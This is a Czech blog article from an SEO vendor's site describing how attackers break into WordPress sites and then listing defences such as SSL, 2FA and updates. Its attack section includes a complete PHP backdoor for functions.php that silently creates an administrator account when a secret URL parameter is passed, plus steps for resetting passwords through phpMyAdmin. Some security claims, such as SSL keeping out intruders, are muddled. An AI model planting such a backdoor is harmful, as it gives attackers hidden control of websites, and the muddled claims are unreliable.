• WordPress

Jak hacknout WordPress?

  • Felix Rose-Collins
  • 8 min read
Jak hacknout WordPress?

Úvodní stránka

Než začneme psát tento článek, rádi bychom vás upozornili, že hackerství je nezákonné a my nemotivujeme ani nepodporujeme žádné nekalé aktivity. Tento článek slouží výhradně k získání znalostí o tom, jak podvodníci pracují a jak jsou pro jejich udržení na uzdě nezbytné různé metody zabezpečení stránek. Pojďme si o tom promluvit:

  • Jak se podvodníci nabourávají do systému WordPress?
  • Jak zabezpečit své stránky WP před podvodníky?

Takže bez dalších okolků začněme s tématem.

Jak hacknout webové stránky WordPress online?

How to Hack WordPress Website Online (Zdroj: wpsecurityninja.com)

Použití WPScan:

WPScan je bezpečnostní skener WP, který pomáhá majitelům stránek kontrolovat jejich stránky WordPress na zranitelnosti, ale tento skener je také využíván hackery pro naplnění jejich motivů k hackování webových stránek.

WPScan umožňuje majitelům a správcům stránek zadávat uživatelské účty WP a hesla hrubou silou a je hlavním krokem k získání neoprávněného přístupu k účtům WP.

Brute force username and password using WPScan (Hrubá síla uživatelského jména a hesla pomocí WPScan. Zdroj: Medium)

Útoky MIM:

Útoky typu Man-in-middle (MIM) lze snadno provést v případě, že uživatelé používají podobné sítě LAN. Nešifrovaná přihlášení uživatelů jsou snadným cílem, protože všechny údaje jsou viditelné v prostém textu.

Software zapojený do těchto typů útoků dokáže rozpoznat napadená témata, pluginy a dokáže vyčíslit uživatele.

MIM Attacks (Zdroj: Medium)

SQL Injections:

Útoky SQL injection jsou považovány za nejvýznamnější útoky používané k pronikání do webových stránek. Tyto útoky se zaměřují na backendové brány webových stránek a umožňují hackerům proniknout do nich implementací kompromitujících příkazů.

SQL Injections (Zdroj: secure.wphackedhelp.com)

Seznamte se s nástrojem Ranktracker

Univerzální platforma pro efektivní SEO

Za každým úspěšným podnikem stojí silná kampaň SEO. Vzhledem k nesčetným optimalizačním nástrojům a technikám je však těžké zjistit, kde začít. No, už se nebojte, protože mám pro vás přesně to, co vám pomůže. Představuji vám komplexní platformu Ranktracker pro efektivní SEO.

Konečně jsme otevřeli registraci do nástroje Ranktracker zcela zdarma!

Vytvoření bezplatného účtu

Nebo se přihlaste pomocí svých přihlašovacích údajů

Tyto průniky také umožňují hackerům upravovat databáze a příkazy a mazat nebo krást informace o webu.

Protože tyto útoky SQL odhalují zranitelné a nezáplatované weby, usnadňují hackerský úkol a činí ho úspěšným.

Využití služby My SQL/cPanel:

Při této metodě hackeři vytvoří falešný účet nebo změní heslo stávajícího uživatele webu WP. Hackeři se snaží proniknout přes panel cPanel otevřením aplikace PhpMyAdmin. Vyhledají tabulku končící na _users a najdou uživatele, kterého chtějí upravit.

To jim umožní změnit přihlašovací údaje uživatele, do kterého se chtějí nabourat. Vyhledají uživatele a změní jeho heslo (z pole user_pass) tak, že otevřou online generátor MD5, nahradí jej požadovaným a později kliknou na tlačítko #.

Utilizing My SQL/cPanel (Uživatelská jména, zaheslovaná hesla uživatelů, jejich e-mailová ID atd. jsou uložena v databázové tabulce wp_users. Zdroj: firstsiteguide.com)

Uživatelská jména, zaheslovaná hesla uživatelů, jejich e-mailová ID atd. jsou uložena v databázové tabulce wp_users.

Úprava souboru Functions.php:

Hackeři mají také přístup k panelu cPanel a mohou upravit soubor Functions.php. Odemknutím Správce souborů vyhledají složku aktivního tématu. Ze složky public_html/wp_content/themes dohledají téma a upraví soubor functions.php umístěním svého kompromitujícího kódu. Hackerský útok je již v procesu, protože hackerům byl vytvořen nový účet. Po dokončení kompromitovaný kód vymažou.

Vytvoření nového uživatelského účtu prostřednictvím FTP:

Účty FTP obecně pomáhají majitelům stránek vytvářet adresáře v rámci jejich webu, které umožňují konkrétním uživatelům nahrávat/stahovat soubory pomocí jejich přihlašovacích údajů.

Tyto soubory jsou také prohlíženy na internetu.

Kroky k vytvoření účtu FTP na webu:

  • Zadejte požadované údaje
  • Zadejte uživatelské jméno nového uživatele FTP.
  • Zadejte heslo pro přidělení účtu pro přístup přes FTP.
  • Zadejte název adresáře, do kterého chcete získat přístup přes FTP.
  • Napište požadovaný prostor MB, který chcete této složce přidělit.
  • Později stiskněte tlačítko "Vytvořit" a vytvořte nový účet.

Pro získání přístupu přes FTP musí nový uživatel načíst níže uvedená data.


Adresa / Název hostitele / Adresa: yourdomain.com nebo ftp.yourdomain.com Uživatel / Uživatel: user@yourdomain.com Heslo: El heslo přiřazené tomuto účtu FTP.

Port: 21Název složky pro nahrávání/stahování souborů.


Nový uživatel bude mít oprávnění ke čtení a zápisu jak ve zvoleném adresáři, tak ve všech podadresářích, které obsahuje. Pokud například vytvoříte uživatele klienta a dáte mu přístup do adresáře / home / user / public_html.

Pronikání zadními vrátky:

Škodlivý způsob, jak proniknout na web, je přes zadní vrátka. Ať už se jedná o podvodníka, který chce získat přístup na váš web, nebo o uživatele, který chce získat přístup na svůj web prostřednictvím zadních vrátek, oba musí postupovat podle níže uvedených kroků.

Seznamte se s nástrojem Ranktracker

Univerzální platforma pro efektivní SEO

Za každým úspěšným podnikem stojí silná kampaň SEO. Vzhledem k nesčetným optimalizačním nástrojům a technikám je však těžké zjistit, kde začít. No, už se nebojte, protože mám pro vás přesně to, co vám pomůže. Představuji vám komplexní platformu Ranktracker pro efektivní SEO.

Konečně jsme otevřeli registraci do nástroje Ranktracker zcela zdarma!

Vytvoření bezplatného účtu

Nebo se přihlaste pomocí svých přihlašovacích údajů

V případech, kdy je vytvořen nový uživatelský účet přes FTP nebo je proveden reset hesla, ale nepřináší to požadované výsledky, může chtít uživatel hacknout svůj web pomocí zadních vrátek a získat přístup správce.

Kroky k vytvoření zadních vrátek:

  • Otevřete soubor functions.php a vložte níže uvedený kód.
add_action('wp_head', 'wploop_backdoor'); 
function wploop_backdoor() {
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>
  • Později změny uložte.

Crypto Jacking & těžba kryptoměn:

Popularita kryptoměn dala vzniknout novým kybernetickým hrozbám, jako je například crypto-jacking, který se označuje také jako malware pro těžbu kryptoměn.

Zabavení počítače proti vůli i vědomí uživatele se nazývá crypto-jacking. V případě malwaru crypto-jacking podvodníci infikují počítač uživatele škodlivým malwarem dodávaným prostřednictvím softwaru pro kompromitaci systémů a sítí.

Phishing:

Phishing je metoda, při níž podvodníci podvádějí uživatele a vydávají se za právnické osoby, které jim poskytnou citlivé údaje (přihlašovací údaje, číslo sociálního účtu, PIN, údaje o kreditní kartě atd.). Ke splnění svého účelu se obvykle uchylují k e-mailům.

Příklad: Podvodník se může vydávat za důvěryhodný zdroj a shromažďovat osobní údaje uživatelů, aby splnil jejich přání. Může také do phishingového e-mailu vložit špatný odkaz a nasměrovat je na nějakou podvodnou stránku, kam doručí malware.

Malware:

Statistiky zabezpečení WordPressu uvádějí, že 4000 webových stránek WP je infikováno malwarem kvůli falešným pluginům SEO.

Podvodníci nepotřebují k doručení malwaru žádný zdroj. SEO pluginy, témata WP a mnoho dalších faktorů přítomných na webu motivovalo hackery k použití nedávného malwaru WP-VCD.

I phishingové e-maily jsou vstupní branou pro doručení malwaru.

I zde je motto hackerů stejné, tj. získat citlivé údaje uživatelů proniknutím do systémů a krádeží informací.

Ransomware pro WordPress:

V případě ransomwaru WP používají hackeři malware k zablokování přístupu uživatelů k systémům a sítím. Ten může uživatel obnovit zaplacením výkupného, které požaduje hacker.

Příklad: Útok Petya, při kterém hacker zašifruje vaše soubory a data a požaduje výkupné za dešifrovací klíč.

Útok XSS (Cross-Site Scripting):

Útoky XSS provádějí hackeři tak, že do webové stránky vloží škodlivý obsah, čímž zneužijí prohlížeč. Tento útok umožňuje hackerům krást data ze souborů cookie, měnit obsah webu a zmocnit se webu za účelem získání citlivých údajů.

Clickjacking:

Při clickjackingu se hacker pokusí škodlivě kompromitovat tlačítko/odkaz a motivuje uživatele, aby na kompromitovaný objekt kliknul. To hackerovi umožní spustit škodlivé příkazy a získat přístup k citlivým údajům uživatele.

Spoofing:

Spoofing je útok, při kterém se osoba vydává za důvěryhodnou identitu, aby získala nezákonný prospěch na uživateli a podvedla ho, aby jí poskytl své důvěrné informace.

Abyste zabránili všem těmto hackerským útokům, je třeba přijmout zvláštní bezpečnostní opatření k zabezpečení webových stránek WP.

Jak zabezpečit webové stránky WordPress před hackingem?

How to Secure WordPress Website from Hacking? (Zdroj: envisagedigital.co.uk)

Výše uvedené statistiky dostatečně vypovídají o popularitě WordPressu. Právě tato popularita činí tuto platformu CMS žádanější mezi hackery, kteří se snaží různými metodami hackerů získat přístup k webům WP a jejich datům.

Proto je nutné vědět, jak zabránit hackerům v přístupu na vaše stránky WP.

Zabezpečte své stránky WP pomocí SSL certifikátu:

Když se na webu načítají jakákoli data, jsou vždy v prostém textu, který je snadno viditelný pro všechny včetně hackerů. To může být riskantní, protože hackeři mohou data na webu zneužít.

Certifikáty SSL (Secure Socket Layers ) jsou digitální certifikáty, které pomáhají zabezpečit vaše stránky WP 256bitovým šifrováním, a převádějí tak data vašich stránek do zakódovaného formátu.

Hackeři nemohou číst kódy, i když získali přístup na vaše stránky, a proto jsou nuceni takové stránky opustit.

Secure your WP site with SSL Certificate (Zdroj: clickssl.net)

Vyberte požadovanou značku SSL certifikátu (Comodo, Thawte, RapidSSL atd.) a nainstalujte jej na své stránky WP. V případě typu SSL certifikátu je třeba rozumět doménám a subdoménám. Například pokud má váš web WP subdomény, pak jediný levný certifikát Wildcard, který stojí přibližně jen 45 USD/rok, může zabezpečit celý váš digitální podnik.

Rychlé vystavení, 2048bitové šifrování klíče, zvýšení SEO, pečeť důvěryhodnosti webu, 99% kompatibilita s prohlížeči/mobilními zařízeními, politika vrácení peněz a záruka - to jsou některé z funkcí a výhod instalace SSL certifikátů Wildcard.

Různé značky a možnosti produktů SSL, příznivé ceny a vynikající zákaznický servis jsou některé z výhod, které přináší obchod ClickSSL pro zabezpečení vašich stránek WP.

Aktualizujte své zaměstnance:

Lidské chyby mohou mít katastrofální následky, proto vždy dbejte na to, aby vaši zaměstnanci byli informováni o nejnovějších kybernetických hrozbách, a vyhněte se tak jejich zranitelnosti.

Pokud vaši zaměstnanci dokážou vysledovat podezřelé signály hacknutých webových stránek v počáteční fázi, mohou informovat příslušné osoby a zabránit tak dalším škodám na vašich stránkách a v podnikání.

Používejte dvoufaktorové ověřování (2FA):

Zavedení 2FA během přihlašování k webu je nejdůležitějším způsobem, jak zabránit útokům hrubou silou. Kromě toho, že přidávají další vrstvu zabezpečení, zabraňují také přenosu dat webu a uživatelů.

Pokud je totiž narušena jedna vrstva zabezpečení, podvodník musí proniknout do druhé vrstvy, aby získal přístup na webové stránky.

Je to těžké rozhodnutí, a proto se ve většině případů podvodníci nakonec přesunou na jiné špatně zabezpečené stránky.

Tip: WP 2FA je bezplatný doplněk WP, který poskytuje další bezpečnostní vrstvu pro vaše stránky WP.

Pravidelný audit uživatelů správce:

To je důležité pro zabezpečení webu WP. Zajistěte pravidelný audit uživatelů administrátora a křížovou kontrolu jejich přístupů.

Zajistěte také, aby uživatelé i zaměstnanci měli omezený přístup podle svých úkolů, a předejděte tak bezpečnostním chybám.

Pravidelně aktualizujte jádro WordPressu:

Nevíte o jádru WP?

Dovolte mi, abych vás stručně informoval, že jádro WP obsahuje všechny základní soubory potřebné pro fungování WP.

Výpis souborů v zip souboru WP staženém z WordPress.org

Update WordPress Core Regularly (Zdroj: ithemes.com)

Tyto základní soubory je třeba pravidelně aktualizovat po vydání aktualizací zabezpečení, aby byly opraveny všechny bezpečnostní chyby.

Stáhněte si motivy WP a pluginy z důvěryhodných zdrojů:

To je klíčové, protože zásuvné moduly mohou být nebezpečné, pokud nejsou aktualizovány nebo jsou nainstalovány z nedůvěryhodných zdrojů. V případě používání bezplatných/placených zásuvných modulů vždy zkontrolujte níže uvedené faktory, jako např:

  • Hodnocení a recenze uživatelů
  • Uživatelská přívětivost
  • Kompatibilita
  • Zabezpečení
  • Důvěryhodnost

Download WP Themes & Plugins from Trustworthy Sources (Zdroj: torquemag.io)

Stejné pravidlo platí i pro instalaci témat WP.

Pravidelně aktualizujte témata a pluginy WP:

Zastaralé nebo prošlé motivy a pluginy WP vždy představují hrozbu pro vaše stránky WP, protože ztrácejí na svých bezpečnostních standardech. Abyste zabránili hackerům využívat takové brány k šíření malwaru a získat tak přístup k webu, zajistěte pravidelnou aktualizaci témat a pluginů používaných na vašem webu WP.

Díky tomu bude plugin správně fungovat a bude synchronizován s nejnovějšími verzemi WP.

Tip: Na stránce zásuvných modulů můžete zobrazit všechny nainstalované zásuvné moduly a u každého z nich odkaz "Povolit automatické aktualizace". Zapněte jej pro automatické aktualizace.

Upravte výchozí jméno správce:

Hackeři jsou příliš chytří a mohou snadno proniknout na vaše stránky WP pomocí výchozího jména správce. Vždy je lepší výchozí uživatelské jméno správce upravit, abyste zabránili hackerům provádět útoky hrubou silou a získat tak neoprávněný přístup na vaše webové stránky.

Udělení omezeného přístupu:

Nikdy nedávejte více, než je nutné, a stejné pravidlo platí i pro udělování přístupu k webu uživatelům i zaměstnancům.

Řízení přístupu je hlavním pravidlem zabezpečení webu a dat, protože určuje, kdo může nebo nemůže mít přístup na webové stránky. Pro zabezpečení webu zablokujte všechny vstupy do administrace WP a další kritické kódy a data.

Omezený přístup nejen zvyšuje produktivitu, ale také zabezpečuje web před škodlivými vstupy.

Aktualizace WordPressu:

Pokud WordPress není aktualizován, hrozí, že vaše stránky napadnou hackeři.

WordPress ovládá 37% podíl na trhu a pravidelně vydává aktualizace, které opravují bezpečnostní díry a chyby. Tyto aktualizace zahrnují také nové funkce a vylepšení těch stávajících, které jsou užitečné pro zvýšení výkonu vašich stránek.

Seznamte se s nástrojem Ranktracker

Univerzální platforma pro efektivní SEO

Za každým úspěšným podnikem stojí silná kampaň SEO. Vzhledem k nesčetným optimalizačním nástrojům a technikám je však těžké zjistit, kde začít. No, už se nebojte, protože mám pro vás přesně to, co vám pomůže. Představuji vám komplexní platformu Ranktracker pro efektivní SEO.

Konečně jsme otevřeli registraci do nástroje Ranktracker zcela zdarma!

Vytvoření bezplatného účtu

Nebo se přihlaste pomocí svých přihlašovacích údajů

Why you should always update your wordpress (Zdroj: wpbeginner.com)

Udržujte své stránky WP aktualizované, abyste zajistili jejich spolehlivé zabezpečení.

Závěr:

Používejte silná a složitá hesla a udržujte své stránky WP i pluginy a témata aktualizované, abyste odstranili všechny bezpečnostní nedostatky. Věnujte čas vzdělávání svých zaměstnanců, protože to vždy pomůže zabránit katastrofám.

Nikdy nepolevujte v zabezpečení a vždy se ujistěte, že používáte nejlepší a důvěryhodné bezpečnostní pluginy, aby vaše stránky WP byly v bezpečí před zvědavýma očima. Kromě toho zabezpečte své stránky pomocí SSL, abyste zvýšili důvěru zákazníků, obchod a SEO.

Nyní, když jste si vědomi toho, jak hackeři fungují, doufáme, že vám tento článek pomůže zabránit průniku hackerů na vaše stránky a spravovat vaše stránky WP bezpečným způsobem.

Felix Rose-Collins

Felix Rose-Collins

Ranktracker's CEO/CMO & Co-founder

Felix Rose-Collins is the Co-founder and CEO/CMO of Ranktracker. With over 15 years of SEO experience, he has single-handedly scaled the Ranktracker site to over 500,000 monthly visits, with 390,000 of these stemming from organic searches each month.

Začněte používat Ranktracker... zdarma!

Zjistěte, co brání vašemu webu v umístění.

Vytvoření bezplatného účtu

Nebo se přihlaste pomocí svých přihlašovacích údajů

Different views of Ranktracker app